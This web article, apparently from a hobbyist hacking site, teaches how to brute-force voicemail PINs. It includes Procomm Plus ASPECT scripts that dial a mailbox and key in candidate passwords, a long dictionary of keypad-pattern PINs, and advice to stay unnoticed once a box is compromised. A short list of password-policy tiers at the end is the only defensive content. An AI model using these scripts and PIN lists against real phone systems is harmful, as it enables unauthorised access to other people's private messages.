|
|
Two programs that attempted to hack voicemail systems were written in the early 1990's, specifically, Voicemail Box Hacker 3.0 and VrACK 0.51. I have attempted to utilize these tools in the past and they were primarily written for much older and less secure voicemail systems. The Voicemail Box Hacker program would only allow for testing of voicemail's with four digit passwords and it is not expandable in the versions we have worked with. The program VrACK, has some interesting features, however it is difficult to script, was written for older x.86 architecture based machines, and is somewhat unstable in newer environments. Both of these programs were probably not supported further due to the relative unpopularity of trying to hack voicemail, hence updates were never continued.
Hence
hacking voicemail leads us to the advent of using our trusty ASPECT scripting
language again.
Similar to brute force hacking dial-up connections using our ASPECT scripts described in the other sections of my site, voicemail boxes can be hacked in a similar fashion. The primary difference though is that using the brute force scripting method, the assumption bases change because essentially you are going to use the scripting method and at the same time listen for a successful hit instead of logging and going back to see if something occurred. Hence this example is an attended or manual hack, and not one for the weary, but one that can work using very simple passwords and combinations of passwords that voicemail box users might choose.
In order to attempt to compromise a voicemail system either manually or by programming
a brute force script (not using social engineering in this example), the required
necessary components are the number of the primary number to access voicemail,
a target voicemail box, including the amount of digits (typically three, four,
or five) and an educated guess about the minimum and maximum length of the voicemail
box password. In most modern organizations, certain presumptions about voicemail
security can usually be made. These presumptions have to do with minimum and
maximum password length, and default passwords to name a few. A company would
have to be insane to not turn on at least some minimum security, however we
have seen it happen. Let's assume though that there is some minimum security
and that voicemail boxes of our target company do have passwords. With that
let the scripting begin.
Our goal is to make something similar to this simple script shown below. Let's
first examine what we want the script to do.
This is a simple example of a script that dials the voicemail box system, waits for the auto attendant to say the greeting such as "Welcome to Company X's voicemail system, mailbox number please…", puts in the voicemail box number, hits pound to accept, then puts in a password, and then pound, then tries the process one more time. This example tests 6 passwords for voicemail box 5019.
Using some ingenuity with your favorite programming language, you can easily create this repetitive script using a dictionary of numbers at your choice. Tweaking of the script, programming for modem characteristics and other potential hiccups will most likely need to occur. This same script can execute nicely on one system and poorly on another. Hence listening to the script as it executes and paying close attention to the process is invaluable.
Once
you have your test prototype down, then you can use a much larger dictionary
of numbers that will be discussed below.
Simple
Voicemail Hacking Script in Procomm Plus ASPECT language
(THIS SAMPLE SCRIPT WORKS WITH NEWER VERSIONS OF PROCOMM
and doesn't work with PCPLUSTD because WAITQUIET wasn't invented yet. You may
need to tweak your settings to get it to work right. It is the concept of how
to do it that I want to hit home)
"ASP/WAS
script for Procomm Plus Voicemail Hacking
"Written by M4phr1k, www.m4phr1k.com, Stephan Barnes
proc main
transmit "atdt*918005551212,,,,,5019#,111111#,,5019#,222222#,,"
transmit "^M"
WAITQUIET 37
HANGUP
transmit "atdt*918005551212,,,,,5019#,333333#,,5019#,555555#,,"
transmit "^M"
WAITQUIET 37
HANGUP
transmit "atdt*918005551212,,,,,5019#,666666#,,5019#,777777#,,"
transmit "^M"
WAITQUIET 37
HANGUP
endproc
Below is a simple preview of what you'd need to tell Procomm Plus aspect script to do in order to repeatedly hack a voicemail system.
Set up PCPLUSTD
The Premise: Pretend the phone number is your target voicemail system (1800X66X665) and that the target mailbox is 9999.
This Script below
This is an ATTENDED HACK so that means you HAVE TO BE THERE LISTENING to the result - - - Or do you?
(Yes you do unless you figure a way to walk away and be able to look for a hit if you get one)
AND you may have to mess with the WAITFOR time (shown as 33 below)...
different phone systems connect at different SPEEDS... this is for a total routine that lasts 33 seconds...you may need to increase the time to get to the end of the transmit.
You'll see what I mean if you listen to it.
;;
VOICEMAIL HACKING EXAMPLE
;; Stephan Barnes (M4phr1k)
;; Works with PCPLUSTD available on http://www.m4phr1k.com
;; You need to LISTEN to this! Hint...
TRANSMIT "atdt1800X66X665,,,,#,,9999,,111111#,,222222#,,,*"
TRANSMIT "^M"
WAITFOR 33
HANGUP
TRANSMIT "atdt1800X66X665,,,,#,,9999,,111112#,,232222#,,,*"
TRANSMIT "^M"
WAITFOR 33
HANGUP
;;you could go on and on....
That finite number depends upon the maximum length of the password. The longer the password, the longer the theoretical time it will take to compromise the voicemail box. However, the downside again with this process is that it's an attended hack, something you have to listen to while it is going. However, a clever person could tape record the whole session and play it back later, or take DSP processing and look for anomalies and trends in the process. Regardless of taped or live, you are listening for the anomaly and planning for failure most of the time.
The success message is usually "You have X new messages, Main menu, ….". Every voicemail system has different auto attendants and if you are not familiar with a particular target's attendant, you might not know what to listen for. But don't shy away from that because you are listening for an anomaly in a field of failures. Try it and you'll get the point quickly. Look at the finite math of brute forcing from 000000 to 999999 and you'll see the time it takes to hack the whole "key space" is long. As you add a digit the exponential goes up. Hence other methods might be useful to reduce the testing time.
So what can we do to help reduce our finite testing times. One method is to
use characters (numbers) that people might tend to easily remember. The phone
keypad is an incubator for patterns because of its square design. Users might
use passwords that are in the shape of a Z going from 1235789. With that being
said here is list of patterns I have amassed mostly from observing the phone
keypad. This is not a comprehensive list, but a pretty good listing to try.
Remember to try the obvious things also, such as the same password as the voicemail
box, repeating characters like 111111 that might be a temporary default password.
The more revealing targets will be those that have already set up a voicemail
box, but occasionally you can find a set of voicemail boxes that were set up
but never used by anyone. There's not much point to compromising boxes that
have yet to be setup, unless you are an auditor type trying to get people to
listen and practice better security.
Sequence Pattern Examples:
123456
234567
345678
456789
567890
678901
789012
890123
901234
012345
654321
765432
876543
987654
098765
109876
210987
321098
432109
543210
123456789
987654321
Up and Down Patterns
147741
258852
369963
963369
159951
123321
456654
789987
987654
123369
147789
357753
Z's
1235789
9875321
Repeats
335577
115599
775533
995511
U: 1478963
Inverted U: 7412369
Right U: 1236987
Left U: 3214789
Angles |_: 14789
Angles _|: 78963
Angles -|: 12369
Angles |-: 32147
0's starting at diff points:
147896321
0's starting at diff points: 478963214
0's starting at diff points: 789632147
0's starting at diff points: 896321478
0's starting at diff points: 963214789
0's starting at diff points: 632147896
0's starting at diff points: 321478963
0's starting at diff points: 214789632
X's starting at diff points:
159357
X's starting at diff points: 357159
X's starting at diff points: 159753
X's starting at diff points: 753159
X's starting at diff points: 951357
X's starting at diff points: 357951
+'s starting at diff points:
258456
+'s starting at diff points: 258654
+'s starting at diff points: 456258
+'s starting at diff points: 456852
+'s starting at diff points: 654852
+'s starting at diff points: 654258
+'s starting at diff points: 852456
+'s starting at diff points: 852654
Z starting at diff points:
1235789
Z starting at diff points: 3215978
Z starting at diff points: 9875321
Z starting at diff points: 1895123
Top
Skip over across: 172839
Skip over across 1: 283917
Skip over across 2: 391728
Reverse
Skip over across: 392817
Skip over across 1: 281739
Skip over across 2: 173928
Bottom
Skip over across: 718293
Skip over across 1: 829371
Skip over across 2: 937182
Reverse
Skip over across: 938271
Skip over across 1: 827193
Skip over across 2: 719382
Left to right
Skip over across: 134679
Skip over across 1: 467913
Skip over across 2: 791346
Reverse
Skip over across: 316497
Skip over across 1: 649731
Skip over across 2: 973164
IF you were successful:
Once you have compromised a target, be careful not to change anything. If you changed the password of the box, it might get noticed, unless the person is not a rabid voicemail user or if they are out of town or on vacation. There are very rare instances of companies that have set up policies to change voicemail passwords every X days like computing systems. Hence once someone sets a password, they rarely change it. Listening to other people's messages might land you in jail, so we are not preaching that you should try to get onto a voicemail system this way. As always, we are pointing out the theoretical points of how voicemail can be hacked.
Lastly, this brute force
method could benefit from automation of listening for the anomaly. I have theorized
that if the analog voice could be captured into some kind of digital signal
processing (DSP) device or if a speak and type program were training properly
and listening for the anomaly in the background, it might just save having to
sit and listen to the script.
Example of Levels of Security for Voicemail systems:
Considering the relative ease that you can hack voicemail here are some levels of protection to consider.
-----------------------------------------------------------------------------------------------------------------------------------------
Bronze: VM system that you have configured to have
a minimum password length of at least 8 characters probably no more than 16;
doesnt allow repeating digits ie (11111111),
doesnt allow sequences (12345678),
doesnt allow same number as the voicemail box, forward or backward,
inactivates unused voicemail boxes (one's that new users have not set up) within 5 days of its creation,
locks out a user after 10 failed attempts at the password (longer or shorter fail attempt number depends upon your user base)
doesn't automatically reset a failed attempt counter after a certain amount of time
reset password's and failed attempt counters must be manually reset by the system administrator
-----------------------------------------------------------------------------------------------------------------------------------------
Silver: All of the above but forces a password change every 90 to 180 days.
-----------------------------------------------------------------------------------------------------------------------------------------
Gold: same as all of the above but uses a challenge response mechanism as an add-on to access the voicemail system.
(Note: I have rarely seen this implemented, although have heard it is possible and this would be for voicemail systems of EXTREMELY sensitive nature)
-----------------------------------------------------------------------------------------------------------------------------------------
Bottom line - don't assume that general security is protecting your voicemail so don't leave sensitive information in voicemail